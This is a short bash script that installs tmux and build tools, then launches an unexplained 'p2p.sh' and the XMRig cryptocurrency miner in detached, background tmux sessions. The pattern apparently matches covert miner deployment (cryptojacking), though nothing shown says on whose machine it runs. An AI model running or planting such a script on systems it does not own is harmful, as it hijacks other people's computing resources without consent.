#!/bin/bash

apt-get update	
apt-get install tmux -y
apt install build-essential gnupg2 gcc make gnupg2 unzip -y < "/dev/null"

tmux new-session -d -s 2 'bash p2p.sh'
chmod +x xmrig
tmux new-session -d -s 1 './xmrig --config=config.json'
